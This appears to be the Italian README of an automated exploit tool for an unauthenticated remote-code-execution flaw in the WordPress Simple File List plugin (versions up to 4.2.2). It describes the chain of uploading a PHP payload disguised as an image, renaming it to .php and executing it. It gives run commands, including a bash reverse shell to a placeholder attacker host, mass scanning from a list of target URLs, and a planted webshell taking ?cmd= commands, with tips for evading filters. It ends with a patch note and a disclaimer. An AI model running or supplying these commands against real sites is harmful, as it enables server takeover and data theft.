
Exploit per CVE-2025-34085
Un exploit automatizzato per CVE-2025-34085 (duplicato di CVE-2020-36847), una vulnerabilità critica di esecuzione di codice in remoto non autenticata nel plugin WordPress Simple File List versioni ≤ 4.2.2.
Nota: CVE-2025-34085 è stato respinto da MITRE come duplicato di CVE-2020-36847. La vulnerabilità è reale e corretta nella versione 4.2.3. Entrambi gli ID CVE si riferiscono allo stesso problema sottostante.
| Campo | Dettaglio |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Plugin | Simple File List |
| Versioni Affette | ≤ 4.2.2 |
| Versione Corretta | 4.2.3 |
| Tipo | Caricamento File Senza Restrizioni → Bypass Rinomina → RCE |
| CVSS | 9.8 (Critico) |
| Autenticazione | Nessuna richiesta |
| Scoperta Originale | coiffeur |
| Modulo Metasploit | exploit/multi/http/wp_simple_file_list_rce |
Upload — Un payload PHP viene caricato travestito da file .png tramite l'endpoint di upload del plugin (ee-upload-engine.php). Il motore di upload convalida le estensioni ma accetta file immagine.
Rinomina — La funzionalità di rinomina del plugin (ee-file-engine.php) non impone restrizioni sulle estensioni. L'attaccante rinomina il .png in .php (o .phtml, .php5, .php3).
Esecuzione — Il file PHP rinominato è ora accessibile ed eseguibile nella directory uploads in /wp-content/uploads/simple-file-list/, dando all'attaccante l'esecuzione arbitraria di comandi.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Crea un file targets.txt con un URL per riga:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
Consiglio: Usa
--inlinequando hai bisogno di una reverse shell o quando il target ha filtri sulla query string. Senza--inline, l'exploit crea una webshell che accetta comandi tramite?cmd=.
Gli exploit riusciti vengono registrati in vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt — utile per il tuo report--inline con una reverse shell per evitare di lasciare una webshell persistente con ?cmd=Aggiorna il plugin Simple File List alla versione 4.2.3 o successiva.
Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre la dovuta autorizzazione prima di testare.
| Argomento | Descrizione | Predefinito |
|---|
-u, --url | URL del singolo target | — |
--cmd | Comando da eseguire sul target | id |
--inline | Inietta il comando direttamente nella shell PHP (hardcoded, nessuna webshell ?cmd=) | False |